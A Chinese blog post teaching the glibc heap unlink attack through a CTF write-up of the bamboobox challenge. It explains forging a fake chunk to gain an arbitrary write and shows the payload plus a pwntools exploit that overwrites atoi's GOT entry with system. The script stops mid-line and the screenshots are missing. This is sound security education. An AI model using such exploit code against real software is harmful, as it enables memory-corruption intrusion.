<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="keywords" content="Hexo Theme Redefine">
    
    <meta name="author" content="NEWYM">
    <!-- preconnect -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>

    
    <!--- Seo Part-->
    
    <link rel="canonical" href="http://example.com/2024/07/25/unlink/"/>
    <meta name="robots" content="index,follow">
    <meta name="googlebot" content="index,follow">
    <meta name="revisit-after" content="1 days">
    
        <meta name="description" content="unlinkunlink机制的攻击利用： 我们伪造一个fake chunk，修改其fd为p-0x18（p储存堆块指针的地址，一般为bss段),修改bk为p-0x10,绕过保护，在形成双链表的过程中，修改了p-&gt;p-0x18导致我们可以修改p-&gt;任意地址，进行一次任意地址写，可以修改free为system。 伪造形式  伪造堆块的后一堆块的size低位要为0，这样会认为我们伪造的堆块是释">
<meta property="og:type" content="article">
<meta property="og:title" content="NEWYM">
<meta property="og:url" content="http://example.com/2024/07/25/unlink/index.html">
<meta property="og:site_name" content="NEWYM">
<meta property="og:description" content="unlinkunlink机制的攻击利用： 我们伪造一个fake chunk，修改其fd为p-0x18（p储存堆块指针的地址，一般为bss段),修改bk为p-0x10,绕过保护，在形成双链表的过程中，修改了p-&gt;p-0x18导致我们可以修改p-&gt;任意地址，进行一次任意地址写，可以修改free为system。 伪造形式  伪造堆块的后一堆块的size低位要为0，这样会认为我们伪造的堆块是释">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="c:\Users\22167\AppData\Roaming\Typora\typora-user-images\1721896708264.png">
<meta property="og:image" content="c:\Users\22167\AppData\Roaming\Typora\typora-user-images\1721892819078.png">
<meta property="og:image" content="c:\Users\22167\AppData\Roaming\Typora\typora-user-images\1721898412055.png">
<meta property="og:image" content="c:\Users\22167\AppData\Roaming\Typora\typora-user-images\1721893728713.png">
<meta property="og:image" content="c:\Users\22167\AppData\Roaming\Typora\typora-user-images\1721895397363.png">
<meta property="og:image" content="c:\Users\22167\AppData\Roaming\Typora\typora-user-images\1721895648851.png">
<meta property="og:image" content="c:\Users\22167\AppData\Roaming\Typora\typora-user-images\1721196075234.png">
<meta property="og:image" content="c:\Users\22167\AppData\Roaming\Typora\typora-user-images\1721196106407.png">
<meta property="og:image" content="c:\Users\22167\AppData\Roaming\Typora\typora-user-images\1721196180863.png">
<meta property="og:image" content="c:\Users\22167\AppData\Roaming\Typora\typora-user-images\1721196229520.png">
<meta property="og:image" content="c:\Users\22167\AppData\Roaming\Typora\typora-user-images\1721196252198.png">
<meta property="og:image" content="c:\Users\22167\AppData\Roaming\Typora\typora-user-images\1721196269726.png">
<meta property="og:image" content="c:\Users\22167\AppData\Roaming\Typora\typora-user-images\1721196295295.png">
<meta property="og:image" content="c:\Users\22167\AppData\Roaming\Typora\typora-user-images\1721196376804.png">
<meta property="og:image" content="c:\Users\22167\AppData\Roaming\Typora\typora-user-images\1721196625636.png">
<meta property="og:image" content="c:\Users\22167\AppData\Roaming\Typora\typora-user-images\1721196930737.png">
<meta property="og:image" content="c:\Users\22167\AppData\Roaming\Typora\typora-user-images\1721197085160.png">
<meta property="og:image" content="c:\Users\22167\AppData\Roaming\Typora\typora-user-images\1721197127319.png">
<meta property="og:image" content="c:\Users\22167\AppData\Roaming\Typora\typora-user-images\1721197191265.png">
<meta property="og:image" content="c:\Users\22167\AppData\Roaming\Typora\typora-user-images\1721197212374.png">
<meta property="og:image" content="c:\Users\22167\AppData\Roaming\Typora\typora-user-images\1721197236568.png">
<meta property="og:image" content="c:\Users\22167\AppData\Roaming\Typora\typora-user-images\1721203278661.png">
<meta property="og:image" content="c:\Users\22167\AppData\Roaming\Typora\typora-user-images\1721203433198.png">
<meta property="og:image" content="c:\Users\22167\AppData\Roaming\Typora\typora-user-images\1721205459532.png">
<meta property="og:image" content="c:\Users\22167\AppData\Roaming\Typora\typora-user-images\1721203641379.png">
<meta property="og:image" content="c:\Users\22167\AppData\Roaming\Typora\typora-user-images\1721203665519.png">
<meta property="og:image" content="c:\Users\22167\AppData\Roaming\Typora\typora-user-images\1721203723030.png">
<meta property="article:published_time" content="2024-07-25T09:10:48.161Z">
<meta property="article:modified_time" content="2024-07-25T09:08:57.294Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="c:\Users\22167\AppData\Roaming\Typora\typora-user-images\1721896708264.png">
    
    
    <!--- Icon Part-->
    <link rel="icon" type="image/png" href="/null" sizes="192x192">
    <link rel="apple-touch-icon" sizes="180x180" href="/null">
    <meta name="theme-color" content="#A31F34">
    <link rel="shortcut icon" href="/null">
    <!--- Page Info-->
    
    <title>
        
        NEW YM
    </title>

    
<link rel="stylesheet" href="/fonts/Chillax/chillax.css">


    <!--- Inject Part-->
    

    
<link rel="stylesheet" href="/css/style.css">


    
        
<link rel="stylesheet" href="/assets/build/styles.css">

    

    
<link rel="stylesheet" href="/fonts/GeistMono/geist-mono.css">

    
<link rel="stylesheet" href="/fonts/Geist/geist.css">

    <!--- Font Part-->
    
    
    
    

    
        
<script src="/js/libs/anime.min.js"></script>

    

    <script id="hexo-configurations">
    window.config = {"hostname":"example.com","root":"/","language":"en"};
    window.theme = {"articles":{"style":{"font_size":"16px","line_height":1.5,"image_border_radius":"14px","image_alignment":"center","image_caption":false,"link_icon":true,"title_alignment":"left","headings_top_spacing":{"h1":"3.2rem","h2":"2.4rem","h3":"1.9rem","h4":"1.6rem","h5":"1.4rem","h6":"1.3rem"}},"word_count":{"enable":true,"count":true,"min2read":true},"author_label":{"enable":true,"auto":false,"list":[]},"code_block":{"copy":true,"style":"mac","font":{"enable":false,"family":null,"url":null}},"toc":{"enable":true,"max_depth":3,"number":false,"expand":true,"init_open":true},"copyright":{"enable":true,"default":"cc_by_nc_sa"},"lazyload":true,"recommendation":{"enable":false,"title":"推荐阅读","limit":3,"mobile_limit":2,"placeholder":"/images/wallhaven-wqery6-light.webp","skip_dirs":[]}},"colors":{"primary":"#A31F34","secondary":null,"default_mode":"dark"},"global":{"fonts":{"chinese":{"enable":false,"family":null,"url":null},"english":{"enable":false,"family":null,"url":null}},"content_max_width":"1000px","sidebar_width":"210px","hover":{"shadow":true,"scale":false},"scroll_progress":{"bar":false,"percentage":true},"website_counter":{"url":"https://cn.vercount.one/js","enable":true,"site_pv":true,"site_uv":true,"post_pv":true},"single_page":true,"preloader":true,"open_graph":true,"google_analytics":{"enable":false,"id":null}},"home_banner":{"enable":true,"style":"fixed","image":{"light":"/images/wallhaven-wqery6-light.webp","dark":"/images/wallhaven-wqery6-dark.webp"},"title":"长风破浪会有时，直挂云帆济沧海","subtitle":{"text":[],"hitokoto":{"enable":true,"api":"https://v1.hitokoto.cn"},"typing_speed":1,"backing_speed":80,"starting_delay":500,"backing_delay":1500,"loop":false,"smart_backspace":true},"text_color":{"light":"#fff","dark":"#d1d1b6"},"text_style":{"title_size":"2.8rem","subtitle_size":"1.5rem","line_height":1.2},"custom_font":{"enable":false,"family":null,"url":null},"social_links":{"enable":false,"style":"default","links":{"github":null,"instagram":null,"zhihu":null,"twitter":null,"email":null},"qrs":{"weixin":null}}},"plugins":{"feed":{"enable":false},"aplayer":{"enable":false,"type":"fixed","audios":[{"name":null,"artist":null,"url":null,"cover":null,"lrc":null}]},"mermaid":{"enable":false,"version":"9.3.0"}},"version":"2.6.4","navbar":{"auto_hide":true,"color":{"left":"#f78736","right":"#367df7","transparency":35},"width":{"home":"1200px","pages":"1000px"},"links":{"友链":"傻瓜蛋","path":"/links/","icon":"fa-regular fa-house"},"Archives":{"path":"/archives","icon":"fa-regular fa-archive"},"tags":{"Tags":"标签","icon":"fa-solid fa-tags","path":"/tags/"},"search":{"enable":false,"preload":true}},"page_templates":{"friends_column":4,"tags_style":"blur"},"home":{"sidebar":{"enable":true,"position":"left","first_item":"menu","announcement":null,"show_on_mobile":true,"links":null},"article_date_format":"auto","categories":{"enable":true,"limit":3},"tags":{"enable":true,"limit":3}},"footerStart":"2022/8/17 11:45:14"};
    window.lang_ago = {"second":"%s seconds ago","minute":"%s minutes ago","hour":"%s hours ago","day":"%s days ago","week":"%s weeks ago","month":"%s months ago","year":"%s years ago"};
    window.data = {"masonry":false};
  </script>
    
    <!--- Fontawesome Part-->
    
<link rel="stylesheet" href="/fontawesome/fontawesome.min.css">

    
<link rel="stylesheet" href="/fontawesome/brands.min.css">

    
<link rel="stylesheet" href="/fontawesome/solid.min.css">

    
<link rel="stylesheet" href="/fontawesome/regular.min.css">

    
    
    
    
<meta name="generator" content="Hexo 7.2.0"></head>


<body>
<div class="progress-bar-container">
    

    
        <span class="pjax-progress-bar"></span>
<!--        <span class="swup-progress-icon">-->
<!--            <i class="fa-solid fa-circle-notch fa-spin"></i>-->
<!--        </span>-->
    
</div>



    <style>
    :root {
        --preloader-background-color: #fff;
        --preloader-text-color: #000;
    }

    @media (prefers-color-scheme: dark) {
        :root {
            --preloader-background-color: #202124;
            --preloader-text-color: #fff;
        }
    }

    @media (prefers-color-scheme: light) {
        :root {
            --preloader-background-color: #fff;
            --preloader-text-color: #000;
        }
    }

    @media (max-width: 600px) {
        .ml13 {
            font-size: 2.6rem !important; /* Adjust this value as needed */
        }
    }

    .preloader {
        display: flex;
        flex-direction: column;
        gap: 1rem; /* Tailwind 'gap-4' is 1rem */
        align-items: center;
        justify-content: center;
        position: fixed;
        padding: 12px;
        top: 0;
        right: 0;
        bottom: 0;
        left: 0;
        width: 100vw;
        height: 100vh; /* 'h-screen' is 100% of the viewport height */
        background-color: var(--preloader-background-color);
        z-index: 1100; /* 'z-[1100]' sets the z-index */
        transition: opacity 0.2s ease-in-out;
    }

    .ml13 {
        font-size: 3.2rem;
        /* text-transform: uppercase; */
        color: var(--preloader-text-color);
        letter-spacing: -1px;
        font-weight: 500;
        font-family: 'Chillax-Variable', sans-serif;
        text-align: center;
    }

    .ml13 .word {
        display: inline-flex;
        flex-wrap: wrap;
        white-space: nowrap;
    }

    .ml13 .letter {
        display: inline-block;
        line-height: 1em;
    }
</style>

<div class="preloader">
    <h2 class="ml13">
        NEW YM
    </h2>
    <script>
        var textWrapper = document.querySelector('.ml13');
        // Split text into words
        var words = textWrapper.textContent.trim().split(' ');

        // Clear the existing content
        textWrapper.innerHTML = '';

        // Wrap each word and its letters in spans
        words.forEach(function(word) {
            var wordSpan = document.createElement('span');
            wordSpan.classList.add('word');
            wordSpan.innerHTML = word.replace(/\S/g, "<span class='letter'>$&</span>");
            textWrapper.appendChild(wordSpan);
            textWrapper.appendChild(document.createTextNode(' ')); // Add space between words
        });

        var animation = anime.timeline({loop: true})
            .add({
                targets: '.ml13 .letter',
                translateY: [40,0],
                translateZ: 0,
                opacity: [0,1],
                filter: ['blur(5px)', 'blur(0px)'], // Starting from blurred to unblurred
                easing: "easeOutExpo",
                duration: 1400,
                delay: (el, i) => 300 + 30 * i,
            }).add({
                targets: '.ml13 .letter',
                translateY: [0,-40],
                opacity: [1,0],
                filter: ['blur(0px)', 'blur(5px)'], // Ending from unblurred to blurred
                easing: "easeInExpo",
                duration: 1200,
                delay: (el, i) => 100 + 30 * i,
                complete: function() {
                    hidePreloader(); // Call hidePreloader after the animation completes
                }
            });

        let themeStatus = JSON.parse(localStorage.getItem('REDEFINE-THEME-STATUS'))?.isDark;

        // If the theme status is not found in local storage, check the preferred color scheme
        if (themeStatus === undefined || themeStatus === null) {
            if (window.matchMedia && window.matchMedia('(prefers-color-scheme: dark)').matches) {
                themeStatus = 'dark';
            } else {
                themeStatus = 'light';
            }
        }

        // Now you can use the themeStatus variable in your code
        if (themeStatus) {
            document.documentElement.style.setProperty('--preloader-background-color', '#202124');
            document.documentElement.style.setProperty('--preloader-text-color', '#fff');
        } else {
            document.documentElement.style.setProperty('--preloader-background-color', '#fff');
            document.documentElement.style.setProperty('--preloader-text-color', '#000');
        }

        window.addEventListener('load', function () {
            setTimeout(hidePreloader, 5000); // Call hidePreloader after 5000 milliseconds if not already called by animation
        });

        function hidePreloader() {
            var preloader = document.querySelector('.preloader');
            preloader.style.opacity = '0';
            setTimeout(function () {
                preloader.style.display = 'none';
            }, 200);
        }
    </script>
</div>

<main class="page-container" id="swup">

    

    <div class="main-content-container">


        <div class="main-content-header">
            <header class="navbar-container px-6 md:px-12">

    <div class="navbar-content ">
        <div class="left">
            
            <a class="logo-title" href="/">
                
                NEW YM
                
            </a>
        </div>

        <div class="right">
            <!-- PC -->
            <div class="desktop">
                <ul class="navbar-list">
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/"
                                        >
                                    
                                    友链
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/"
                                        >
                                    
                                    PATH
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/"
                                        >
                                    
                                    ICON
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                    
                </ul>
            </div>
            <!-- Mobile -->
            <div class="mobile">
                
                <div class="icon-item navbar-bar">
                    <div class="navbar-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <!-- Mobile sheet -->
    <div class="navbar-drawer h-screen w-full absolute top-0 left-0 bg-background-color flex flex-col justify-between">
        <ul class="drawer-navbar-list flex flex-col px-4 justify-center items-start">
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/"
                        >
                            <span>
                                友链
                            </span>
                            
                        </a>
                        

                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/"
                        >
                            <span>
                                PATH
                            </span>
                            
                        </a>
                        

                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/"
                        >
                            <span>
                                ICON
                            </span>
                            
                        </a>
                        

                        
                    </li>
            

            
            
        </ul>

        <div class="statistics flex justify-around my-2.5">
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/tags">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">0</div>
        <div class="label text-third-text-color text-sm">Tags</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/categories">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">0</div>
        <div class="label text-third-text-color text-sm">Categories</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/archives">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">3</div>
        <div class="label text-third-text-color text-sm">Posts</div>
    </a>
</div>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="main-content-body">

            

            <div class="main-content">

                
                    <div class="post-page-container flex relative justify-between box-border w-full h-full">
    <div class="article-content-container">

        <div class="article-title relative w-full">
            
                <div class="w-full flex items-center pt-6 justify-start">
                    <h1 class="article-title-regular text-second-text-color tracking-tight text-4xl md:text-6xl font-semibold px-2 sm:px-6 md:px-8 py-3"></h1>
                </div>
            
            </div>

        
            <div class="article-header flex flex-row gap-2 items-center px-2 sm:px-6 md:px-8">
                <div class="avatar w-[46px] h-[46px] flex-shrink-0 rounded-medium border border-border-color p-[1px]">
                    <img src="/images/%E7%99%BD%E8%89%B2%E5%B0%91%E5%B9%B4.jpg">
                </div>
                <div class="info flex flex-col justify-between">
                    <div class="author flex items-center">
                        <span class="name text-default-text-color text-lg font-semibold">NEWYM</span>
                        
                            <span class="author-label ml-1.5 text-xs px-2 py-0.5 rounded-small text-third-text-color border border-shadow-color-1">Lv1</span>
                        
                    </div>
                    <div class="meta-info">
                        <div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fa-regular fa-pen-fancy"></i>&nbsp;
        <span class="desktop">2024-07-25 17:10:48</span>
        <span class="mobile">2024-07-25 17:10:48</span>
        <span class="hover-info">Created</span>
    </span>
    
        <span class="article-date article-meta-item">
            <i class="fa-regular fa-wrench"></i>&nbsp;
            <span class="desktop">2024-07-25 17:08:57</span>
            <span class="mobile">2024-07-25 17:08:57</span>
            <span class="hover-info">Updated</span>
        </span>
    

    
    

    
    
    
    
        <span class="article-pv article-meta-item">
            <i class="fa-regular fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
        </span>
    
</div>

                    </div>
                </div>
            </div>
        

        


        <div class="article-content markdown-body px-2 sm:px-6 md:px-8 pb-8">
            <h1 id="unlink"><a href="#unlink" class="headerlink" title="unlink"></a>unlink</h1><p>unlink机制的攻击利用：</p>
<p>我们伪造一个fake chunk，修改其fd为p-0x18（p储存堆块指针的地址，一般为bss段),修改bk为p-0x10,绕过保护，在形成双链表的过程中，修改了p-&gt;p-0x18导致我们可以修改p-&gt;任意地址，进行一次任意地址写，可以修改free为system。</p>
<p>伪造形式</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="C:\Users\22167\AppData\Roaming\Typora\typora-user-images\1721896708264.png"
                      alt="1721896708264"
                ></p>
<p>伪造堆块的后一堆块的size低位要为0，这样会认为我们伪造的堆块是释放的，才能往前合并。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="C:\Users\22167\AppData\Roaming\Typora\typora-user-images\1721892819078.png"
                      alt="1721892819078"
                ></p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">首先我们要绕过保护</span><br><span class="line">B-&gt;bk!=chunk0||A-&gt;fd!=chunk0</span><br><span class="line">//此时我们的A=p-0x10   fd=A+0x10   fd=p     (这个fd是A的fd)</span><br><span class="line">//此时我们的B=p-0x18   bk=B+0x18   bk=p    （这个bk是B的bk）</span><br><span class="line">//对应了下面的步骤</span><br><span class="line">chunk0-&gt;fd=p-0x18//这里的p-0x18是我们自己构造的</span><br><span class="line">chunk0-&gt;bk=p-0x10//同理</span><br><span class="line">B-&gt;bk=*（p-0x18+0x18）=*p=chunk0//证明了s=p</span><br><span class="line">A-&gt;fd=*（p+0x10+0x10）=*p=chunk0</span><br><span class="line">//此时*p等于chunk0的话便可以绕过保护</span><br><span class="line"></span><br></pre></td></tr></table></figure></div>

<p>这里我要提出一个问题了</p>
<p>为什么我们要伪造堆块而不用原堆块呢？</p>
<p>你要想一下我们绕过保护的要求是什么，最终我们回到的地方是chunk0，而最开始我们指向的是原堆块的数据区，我们是无法指到头部的，而我们构造的正好是可以指向头部的</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="C:\Users\22167\AppData\Roaming\Typora\typora-user-images\1721898412055.png"
                      alt="1721898412055"
                ></p>
<p>&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="C:\Users\22167\AppData\Roaming\Typora\typora-user-images\1721893728713.png"
                      alt="1721893728713"
                ></p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">//在使AB构成双链表</span><br><span class="line">B-&gt;bk=A</span><br><span class="line">A-&gt;fd=B</span><br><span class="line">//此时A=p-0x10  B=0x18</span><br><span class="line">//等同于*p=p-0x10</span><br><span class="line">//然后*p=p-0x18</span><br><span class="line">//最终p会指向p-0x18的位置</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="C:\Users\22167\AppData\Roaming\Typora\typora-user-images\1721895397363.png"
                      alt="1721895397363"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="C:\Users\22167\AppData\Roaming\Typora\typora-user-images\1721895648851.png"
                      alt="1721895648851"
                ></p>
<p>们在读入的时候就会往从p-0x18的位置开始读入，最后覆盖掉读入位置，在进行读入就从*p进行读入，相当于一次任意地址写</p>
<p>例如我们覆盖到读入位置为atoi函数的got表，</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="C:\Users\22167\AppData\Roaming\Typora\typora-user-images\1721196075234.png"
                      alt="1721196075234"
                ></p>
<p>我们下次就会对这里进行修改</p>
<p>然后读入的内容从</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="C:\Users\22167\AppData\Roaming\Typora\typora-user-images\1721196106407.png"
                      alt="1721196106407"
                ></p>
<p>这里读入</p>
<p>那么我们就可以覆盖got表了</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="C:\Users\22167\AppData\Roaming\Typora\typora-user-images\1721196180863.png"
                      alt="1721196180863"
                ></p>
<h5 id="例题"><a href="#例题" class="headerlink" title="例题"></a>例题</h5><h2 id="bamboobox"><a href="#bamboobox" class="headerlink" title="bamboobox"></a>bamboobox</h2><p>首先查看保护</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="C:\Users\22167\AppData\Roaming\Typora\typora-user-images\1721196229520.png"
                      alt="1721196229520"
                ></p>
<p>64位开启了canary和nx保护</p>
<p>查看ida</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="C:\Users\22167\AppData\Roaming\Typora\typora-user-images\1721196252198.png"
                      alt="1721196252198"
                ></p>
<p>菜单题</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="C:\Users\22167\AppData\Roaming\Typora\typora-user-images\1721196269726.png"
                      alt="1721196269726"
                ></p>
<p>show函数内，我们查看一下打印的位置bss1在哪里，这里是我们随后创造第一个堆块的索引位置（重点关注）</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="C:\Users\22167\AppData\Roaming\Typora\typora-user-images\1721196295295.png"
                      alt="1721196295295"
                ></p>
<p>查看add函数，创造指定大小堆块，将堆块索引位置放到itemlist的位置，这里我们就知道堆块地址在这个bss段放置了，而且前面的show也是打印itemlist+8的位置</p>
<p>且add里的read函数也是往itemlist+8的位置读入，也就是对堆块读入内容</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="C:\Users\22167\AppData\Roaming\Typora\typora-user-images\1721196376804.png"
                      alt="1721196376804"
                ></p>
<p>在change函数中存存在自己规定大小的堆溢出，可以用于修改后面堆块的pre_size（前一个堆块的大小）size自己堆块的大小（主要改成地位为0，将前一个堆块标记为释放状态）</p>
<p>free释放函数</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="C:\Users\22167\AppData\Roaming\Typora\typora-user-images\1721196625636.png"
                      alt="1721196625636"
                ></p>
<p>思路：</p>
<p>1.部署堆块（fk&#x3D;itemlist-0x18，bk&#x3D;itemlist-0x10），并设置后一个堆块标识位（size低位为0）</p>
<p>2.然后释放后itemlist+8的位置会指向fk的位置，这时候覆盖到itemlist+8，即可任意读写（覆盖为atoi_got）</p>
<p>3.然后show打印出atoi的got表地址，根据偏移可以找到system</p>
<p>4.这时候读入取覆盖安atoi的got表为stystem即可</p>
<p>部署的堆块</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="C:\Users\22167\AppData\Roaming\Typora\typora-user-images\1721196930737.png"
                      alt="1721196930737"
                ></p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">target = 0x6020c8  </span><br><span class="line">fd = target - 0x18</span><br><span class="line">bk = target - 0x10</span><br><span class="line">payload = p64(0)+p64(0x81)+p64(fd)+p64(bk)+b&#x27;a&#x27;*0x60+p64(0x80)+p64(0x90)</span><br><span class="line">change(0,payload)</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="C:\Users\22167\AppData\Roaming\Typora\typora-user-images\1721197085160.png"
                      alt="1721197085160"
                ></p>
<p>然后释放，itemlist+8指向了itemlist-0x18的位置，此时我们读入就从itemlist-0x18读入，可以覆盖到itemlist+8，即可任意读写</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="C:\Users\22167\AppData\Roaming\Typora\typora-user-images\1721197127319.png"
                      alt="1721197127319"
                ></p>
<p>我们读入地址覆盖itemlist+8为atoi</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="C:\Users\22167\AppData\Roaming\Typora\typora-user-images\1721197191265.png"
                      alt="1721197191265"
                ></p>
<p>先打印获得libc地址，找到system地址</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="C:\Users\22167\AppData\Roaming\Typora\typora-user-images\1721197212374.png"
                      alt="1721197212374"
                ></p>
<p>修改atoigot表为system<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="C:\Users\22167\AppData\Roaming\Typora\typora-user-images\1721197236568.png"
                      alt="1721197236568"
                ></p>
<p>这时候就成功了</p>
<p>最终的exp</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">from tools import *</span><br><span class="line">p = process(&#x27;./bam&#x27;)</span><br><span class="line">#p=remote(&quot;node3.buuoj.cn&quot;,27073)</span><br><span class="line">context.log_level = &#x27;debug&#x27;</span><br><span class="line"></span><br><span class="line">elf = ELF(&quot;./bam&quot;)</span><br><span class="line">#libc = ELF(&quot;./buu/libc64/libc-2.30.so&quot;)</span><br><span class="line">libc=ELF(&quot;./libc-2.23.so&quot;)</span><br><span class="line">atoi_got = elf.got[&#x27;atoi&#x27;]</span><br><span class="line"></span><br><span class="line">def show():</span><br><span class="line">    p.recvuntil(&quot;Your choice:&quot;)</span><br><span class="line">    p.sendline(str(1))</span><br><span class="line"></span><br><span class="line">def alloc(size,content):</span><br><span class="line">    p.recvuntil(&quot;Your choice:&quot;)</span><br><span class="line">    p.sendline(str(2))</span><br><span class="line">    p.recvuntil(&quot;length of item name:&quot;)</span><br><span class="line">    p.sendline(str(size))</span><br><span class="line">    p.recvuntil(&quot;name of item:&quot;)</span><br><span class="line">    p.sendline(content)</span><br><span class="line"></span><br><span class="line">def change(idx,content):</span><br><span class="line">    p.recvuntil(&quot;Your choice:&quot;)</span><br><span class="line">    p.sendline(str(3))</span><br><span class="line">    p.recvuntil(&quot;index of item:&quot;)</span><br><span class="line">    p.sendline(str(idx))</span><br><span class="line">    p.recvuntil(&quot;length of item name:&quot;)</span><br><span class="line">    p.sendline(str(len(content)))</span><br><span class="line">    p.recvuntil(&quot;new name of the item:&quot;)</span><br><span class="line">    p.sendline(content)</span><br><span class="line"></span><br><span class="line">def free(idx):</span><br><span class="line">    p.recvuntil(&quot;Your choice:&quot;)</span><br><span class="line">    p.sendline(str(4))</span><br><span class="line">    p.recvuntil(&quot;index of item:&quot;)</span><br><span class="line">    p.sendline(str(idx))</span><br><span class="line"></span><br><span class="line">alloc(0x80,&quot;aaaa&quot;)</span><br><span class="line">alloc(0x80,&quot;bbbb&quot;)</span><br><span class="line">alloc(0x80,&quot;cccc&quot;)</span><br><span class="line"></span><br><span class="line">target = 0x6020c8  </span><br><span class="line">fd = target - 0x18</span><br><span class="line">bk = target - 0x10</span><br><span class="line">payload = 